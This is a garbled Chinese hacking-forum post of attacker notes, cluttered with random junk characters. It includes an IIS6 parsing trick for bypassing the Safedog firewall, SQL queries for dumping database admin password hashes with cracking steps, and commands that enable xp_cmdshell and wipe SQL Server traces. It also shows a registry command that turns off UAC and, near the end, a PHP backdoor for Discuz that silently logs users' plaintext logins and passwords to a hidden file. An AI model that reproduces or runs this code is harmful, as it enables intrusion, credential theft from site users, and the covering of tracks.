: \7 `$ Q7 m2 k. f l# N在它下面直接插入即可,记录的密码生成在pwd.txt中,
3 ]% d. Y" Z$ h( F1 A* \; O/ Q3 D1 \其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
8 a& O$ r& X, h: Z; F" @- q利用II6文件解析漏洞绕过安全狗代码:
) n( D' ?. N" A9 t- n7 e. z" R( @) P+ @;antian365.asp;antian365.jpg
$ _9 z2 m. E- C
5 e5 u9 y Y) j- H8 h) }$ y$ D各种类型数据库抓HASH破解最高权限密码!
$ u O9 w4 W9 w1.sql server2000
1 h* Z U2 U f& BSELECT password from master.dbo.sysxlogins where name='sa', o0 W; Z0 a$ Z5 D- c
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
+ o1 A9 _! d# e" [2FD54D6119FFF04129A1D72E7C3194F7284A7F3A$ R. l+ a ]$ p3 D
2 _, ^7 y4 K `5 k+ d2 f0×0100- constant header$ j+ V8 H& x; U4 j
34767D5C- salt' ?; E* Q9 K. F8 S
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash: m, p5 w! q$ k' ~% y( X$ x3 K
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
, U2 e5 O/ N$ z& ^* G9 icrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
) x) }5 q& D% [- d4 F- I- ?SQL server 2005:-
6 A% L; q* c( ISELECT password_hash FROM sys.sql_logins where name='sa'
: Y1 d& R3 e: ` l0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
2 f. N9 G1 Q# d; M" e& `0×0100- constant header
8 O5 X+ x" A7 `( E993BF231-salt9 u/ k2 i+ l7 ^6 E+ P4 i! F
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
' ^0 ?+ p" ?7 @crack case sensitive hash in cain, try brute force and dictionary based attacks.
6 B! C. ^$ j/ _( b3 I0 G
2 s, ^2 h n8 \update:- following bernardo’s comments:-, F- k) j* O9 K2 K7 f5 t
use function fn_varbintohexstr() to cast password in a hex string.$ c6 }) L# E: N/ T: m
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
, A7 L8 n! H* f. I: F
# ?& Y1 `$ D( OMYSQL:-9 f! G% i7 x( I% _- X# C" I
1 C: e8 ^" W: T5 F9 A
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.( e0 l6 U* P* c
w% N! |/ U1 Q/ j7 g) z$ c! C*mysql < 4.1
) D ] ]4 U' A8 c4 a6 t. ~* [2 u7 H* E/ o* \
mysql> SELECT PASSWORD(‘mypass’);
4 |6 w6 P H2 A% v1 \+——————–+3 p( u% `- ?3 f! ~
| PASSWORD(‘mypass’) |; }$ Q- S+ l$ G7 N3 Y
+——————–+
+ E) p' {6 b, p, c3 T7 H| 6f8c114b58f2ce9e |- {, s i i8 X3 b% u+ G
+——————–+
: g1 B- T+ i1 u9 E; X& \% Y+ S+ s1 c" y
2 \% C/ t0 W0 z. o% K# W6 t*mysql >=4.19 r4 r% j) O; a6 ?
. L2 d7 r9 Z4 o2 E: h+ G: u2 Gmysql> SELECT PASSWORD(‘mypass’);, c. q% [9 F0 R+ d
+——————————————-+
3 k E! \3 ?7 p! ^* H1 o| PASSWORD(‘mypass’) |, ^! B9 I3 L0 `5 H5 |; D
+——————————————-+
, Y N0 c0 a, [& P6 A4 R& |6 B* z& ^| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
3 C# }. U7 { y+——————————————-+8 M. @6 \9 A1 W4 t7 s# q
8 m2 ?$ h7 x% b. B/ K/ V# u, V/ XSelect user, password from mysql.user
2 ?# O$ X' |; d* M. wThe hashes can be cracked in ‘cain and abel’
# X6 x0 m) H' i1 [/ d: L. D+ {! g$ P* w ]3 C/ i9 ?
Postgres:-
7 F2 Z; \) A5 Z: yPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)- w, T3 J5 C8 P: [& t
select usename, passwd from pg_shadow;) a6 b2 ]3 s4 F3 f3 b1 ?
usename | passwd; a% T7 N8 D$ ~# r
——————+————————————- w* m8 L# u0 \/ C) ?* Q. w) f
testuser | md5fabb6d7172aadfda4753bf0507ed4396
: O3 y, D, Y5 t9 Kuse mdcrack to crack these hashes:-9 ^/ a: [4 e; h" {% M0 g
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43966 F3 C5 ]# T2 q( G4 `4 ~
: M% L1 A' x& d- Q" wOracle:-9 T) S1 L' D! o2 A
select name, password, spare4 from sys.user$; r# N- c7 w8 c! A' G2 T$ ?/ l
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
, {% E- ~$ J* o. {+ J/ lMore on Oracle later, i am a bit bored….3 z2 B4 ]- u1 Z' f1 }% X
?' S I2 ?9 {1 r2 x0 c) O8 @6 h
) B7 h L; n9 j% ~在sql server2005/2008中开启xp_cmdshell
]% }# {! t3 f& a) L% o-- To allow advanced options to be changed. w0 J3 R/ r) Q3 D! ^( d
EXEC sp_configure 'show advanced options', 1' j8 [ b0 C% C$ K9 V" D
GO s4 b5 k2 I7 p" q
-- To update the currently configured value for advanced options.
1 Q" U) }5 |$ D' QRECONFIGURE
: F4 J6 q& Z' y" _GO
& m: o& n# Q1 G0 G. v-- To enable the feature.0 {: D) _3 t7 |/ T u! |
EXEC sp_configure 'xp_cmdshell', 1& f0 Y+ b7 i Y8 P9 }; w
GO
2 W7 u# @. d" W+ D-- To update the currently configured value for this feature.
3 K* H( ^2 A% e nRECONFIGURE8 i0 Y7 ?+ R4 w" H* }2 a% W
GO
. `' a9 d, s8 C2 z- [/ e5 dSQL 2008 server日志清除,在清楚前一定要备份。' O' @& Q5 \" ~ Z# U1 c1 K5 Y
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
8 H0 j2 V- A) I) v9 N- f1 B: UX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin/ K# P- U1 P* d4 I( n
+ n' `! q9 F9 S! W! {对于SQL Server 2008以前的版本:7 a* Y7 O `$ U) ?4 c
SQL Server 2005:
0 h: h7 \, r" U) @! b4 q删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat/ L+ n4 u8 t% v& }6 r) U
SQL Server 2000:7 q# C2 h/ d* @5 [( d
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
( q5 h9 H/ p: \
2 m0 f5 Q2 ]; B( M0 K4 l本帖最后由 simeon 于 2013-1-3 09:51 编辑
o3 z: s# O! {0 T, y
, J, J% X! u& ^0 U* n" L
4 {0 b$ {' D7 U% M! ]- h! e a. Qwindows 2008 文件权限修改
0 J+ n9 }) i' F; A. M1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
6 s7 V# Y: _$ ~3 o' ?9 C# L: j2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
& A, A( w4 v1 f E3 u一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”," P) G9 A6 E+ Z K& F
5 H# |# x$ }. O2 T+ xWindows Registry Editor Version 5.00; i/ V* p" c; S: F# d" J
[HKEY_CLASSES_ROOT\*\shell\runas]
' [( J' `( f5 P+ ?# V@="管理员取得所有权"4 q! A' Z. @% n3 \' U4 q
"NoWorkingDirectory"=""5 b4 {) l$ G) k
[HKEY_CLASSES_ROOT\*\shell\runas\command]
6 n4 q. N! ^; _9 N7 F( x% s H@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
# J5 g8 n" x! }4 Z5 g% c1 G"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"' `0 {4 r1 C- ?# S* C
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
/ n$ w% @2 q9 L* w& X" G7 Y@="管理员取得所有权"; ^9 t! Z. j, ^* C$ T6 \! _+ r% E
"NoWorkingDirectory"=""
. N$ N J+ P; M- l7 j[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
3 o# h m7 V; @. c@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
/ N) b# ]3 A' t; m+ o) Z"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
$ g3 J _7 @% e5 b7 n5 G+ b: h: j) s" b
[HKEY_CLASSES_ROOT\Directory\shell\runas]" h, h; H S2 `0 Y b, H
@="管理员取得所有权"- t' m$ A$ o( U; E5 b( {& l
"NoWorkingDirectory"=""2 a# N( a) z- p! L) T
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
. o1 |5 u, o# c@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
1 D. T5 P# q( [) o7 p' m"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
3 ]6 q) ?0 H! ^0 E( I5 o" r: d$ p" W; v7 t. y: |0 _
1 g2 _% Q- t, ^( R& [
win7右键“管理员取得所有权”.reg导入
! B9 j* z# i, {6 W2 l二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,8 Z! z+ c" f, }& W# v h3 _
1、C:\Windows这个路径的“notepad.exe”不需要替换: r' `3 c- R- r5 O( g; }) S+ n
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
4 J/ w9 Q; x) ]6 i4 |3、四个“notepad.exe.mui”不要管
4 @& r' V! l V" n4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
- z8 ~7 c6 E; e4 k( AC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
* u, n# {. z8 s' L替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
; e* l0 j% i4 P$ `; O: ~8 r替换完之后回到桌面,新建一个txt文档打开看看是不是变了。5 P3 a& J( s( Y( e2 W
windows 2008中关闭安全策略: ; D0 G. A# d4 M& l
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f& |$ r Z" A! W2 U' k1 I
修改uc_client目录下的client.php 在% X ~* o9 y; L% K, R$ H/ Z
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {) m* C5 F& s/ J- z7 B; H. I8 i/ _$ ?6 k
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
* a( c4 x* _9 Y* `) a. P你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
8 \+ P* B3 A1 A% G4 Nif(getenv('HTTP_CLIENT_IP')) {
" m0 r4 O0 z! b5 T+ u6 L$onlineip = getenv('HTTP_CLIENT_IP');2 f$ Y* r( \4 H9 r; F% J$ h* K6 D) b
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {# b5 |- p3 @. n+ i9 m; H$ E! H
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
! T7 W0 \ Y/ t3 w/ O} elseif(getenv('REMOTE_ADDR')) {! D- C( B* M2 {1 M9 ^. k6 w/ B& r" U. R
$onlineip = getenv('REMOTE_ADDR');
3 T5 Z; Q7 ?$ S$ s3 b} else {
; Q$ f6 v7 P8 I4 g( M% U$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];( S! c- E' H% J5 j5 P, W
}% [5 y \2 B) U& ^" c: N( T6 V
$showtime=date("Y-m-d H:i:s");
, y) v2 V' E4 q9 N9 O! l9 I $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";9 P4 Y' S1 v `( ~
$handle=fopen('./data/cache/csslog.php','a+');
7 B3 P x3 K8 ]% ]3 v $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对